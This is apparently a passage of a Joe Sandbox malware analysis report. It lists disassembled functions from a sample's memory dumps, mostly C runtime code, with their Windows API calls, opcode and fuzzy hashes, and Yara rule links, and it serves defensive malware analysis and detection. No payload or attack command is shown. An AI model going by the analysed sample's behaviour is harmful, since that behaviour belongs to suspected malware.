                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8a0f754249bb4541e519d14dcbdbc9e078fb0e2c693eb2830af628f7b2e29a01
                                                                                                                                                                                                                                                                          • Instruction ID: 4b49ae60ad55c85d294ac8bd7a117a662831b2d5bf7d99c3adb64bc0bdc7b609
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a0f754249bb4541e519d14dcbdbc9e078fb0e2c693eb2830af628f7b2e29a01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          Function 00891DBC Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e7466fe82099879f82fd4b790c7483bde7a5c1227424817e8dd01b588b04991
                                                                                                                                                                                                                                                                          • Instruction ID: 4ab76558ead5e10c4b7bb0b9128ef7daff72b1f9bef40dae5d26d5dd8c31d6e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e7466fe82099879f82fd4b790c7483bde7a5c1227424817e8dd01b588b04991
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45A02230A00200CFF3888FB2EE0830C3BE8BA0B2C03088038E208C0C30EB308080EF02
                                                                                                                                                                                                                                                                          Function 00871000 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5fc8e63c8680ec137536d547794cab7b3535407bac1b61116d8292593f680786
                                                                                                                                                                                                                                                                          • Instruction ID: 1db953363f11f6b349f5779c0c6d92e6c97db8c55c880a40dab981a915708e34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc8e63c8680ec137536d547794cab7b3535407bac1b61116d8292593f680786
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 135176B4E1020D9FCF40DFA8D5959AEBBF4FB09350F20945AE819FB210E730AA41CB65
                                                                                                                                                                                                                                                                          Function 008716A0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 61be3a86a5a2e9bd0a251ed1b06f47359ef682caef7ea1488e009769cf45b45c
                                                                                                                                                                                                                                                                          • Instruction ID: c6b381e966d11fb60f6f5d8c47c6327802de2322abc4f8781aec43b6990d1bc3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61be3a86a5a2e9bd0a251ed1b06f47359ef682caef7ea1488e009769cf45b45c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99D0923A641A58AFC210CF49E440D41F7BCFB8E670B158966EA0993B20C335FC11CAE0
                                                                                                                                                                                                                                                                          Function 0089EDF2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00BA1E48,00BA1E48,00000000,7FFFFFFF,?,0089EDDD,00BA1E48,00BA1E48,00000000,00BA1E48,?,?,?,?,00BA1E48,00000000), ref: 0089EE98
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0089EF53
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0089EFE2
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F02D
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F033
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F069
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F06F
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F07F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0be7d32f8e0ca54c880b7d84778ddf8caa804f15350d8e73760853262c11dfac
                                                                                                                                                                                                                                                                          • Instruction ID: a05629fd7fe28c8fb1901a22008f37e2ada5659e423fe51c5047002345626d08
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be7d32f8e0ca54c880b7d84778ddf8caa804f15350d8e73760853262c11dfac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF71B3729006099FDF24FA688C41BAF7BA9FF49314F2D0169EA05E7283DB769C418761
                                                                                                                                                                                                                                                                          Function 008845A9 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 008845F0
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0088461C
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0088465B
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00884678
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008846B7
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 008846D4
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00884716
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00884739
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                          • Opcode ID: fa0e246cb169483196fa0f5713ec2f1f6365a742636895b4786ab4b7a98d1172
                                                                                                                                                                                                                                                                          • Instruction ID: 8ce6851da5f46b912b9b0d17a702892be3f061406fb3ff8009fd08cf3da0668a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0e246cb169483196fa0f5713ec2f1f6365a742636895b4786ab4b7a98d1172
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C518D7360020BAFEF20BFA4CC45FAA7AA9FF56744F254429F915DA190EB34DC008B61
                                                                                                                                                                                                                                                                          Function 00893332 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                          • Opcode ID: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                                          • Instruction ID: 1cba27cd7edafde185ef47e0c652e250532108843659d7cd83fc787415ce6ff8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB14572A00355AFDF12AF28C881BAE7BA5FF69710F1D4165E904EB382D2709A01C7A5
                                                                                                                                                                                                                                                                          Function 00885440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885477
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0088547F
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885508
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00885533
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885588
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 7611f776bdbbed4d061ac8a4944f7cf40d5d009c8e39b4cc87ddecd4be8394c4
                                                                                                                                                                                                                                                                          • Instruction ID: 8440f4ff0f84b9d195af8f4b5660a044d3c2014794e52633733adf6b4e72ede3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7611f776bdbbed4d061ac8a4944f7cf40d5d009c8e39b4cc87ddecd4be8394c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D41C274A006189FCF10EF6CC884A9EBBA1FF05328F148195E918DB752D731DA52CF96
                                                                                                                                                                                                                                                                          Function 008913F9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A9416E27,?,00891508,008731F2,?,00000000,?), ref: 008914BA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: 030678f209cc68276cbeef07dde3c2b358367292206653b86b77e62bff111ac0
                                                                                                                                                                                                                                                                          • Instruction ID: 35335aeb78567b456f506345d155861c14dd43b5e91fabc90814a4e303f23629
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 030678f209cc68276cbeef07dde3c2b358367292206653b86b77e62bff111ac0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6212B31A05212ABEF21AB65EC48A5A3769FB87774F2D0150E915E76D0EB30ED01C6D4
                                                                                                                                                                                                                                                                          Function 008847BB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008847C1
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 008847CF
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 008847E0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                          • Opcode ID: 560ec38650c81334fd84b2255ed706e85aab3b6541cac9e575586fbb272b9b06
                                                                                                                                                                                                                                                                          • Instruction ID: 3cc47adef8d79b8b386a9d42c0fea44bfaec723ffd2237a2b5dcfc5d91552e81
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 560ec38650c81334fd84b2255ed706e85aab3b6541cac9e575586fbb272b9b06
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D09E71D55210AFB3145FB4BD4D8557AA4FB076213010465F911D2EA4EBB84801DA6E
                                                                                                                                                                                                                                                                          Function 00898F96 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 157547051c7fd3fdbf9d982ed8f92f12bedaccacbf95429ef7f793875201c7d6
                                                                                                                                                                                                                                                                          • Instruction ID: 906ff7366ad40dfc05f4f5afff79190800f6fe04391df9d506aff6ddf0bef31d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 157547051c7fd3fdbf9d982ed8f92f12bedaccacbf95429ef7f793875201c7d6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEB1EE70A04249ABEF15EFDCC881BAD7BB4FF5A314F18426CE995DB292C7309941CB61
                                                                                                                                                                                                                                                                          Function 0088F2AC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0088F2A3,00884E61,008841CC), ref: 0088F2BA
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0088F2C8
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0088F2E1
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0088F2A3,00884E61,008841CC), ref: 0088F333
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
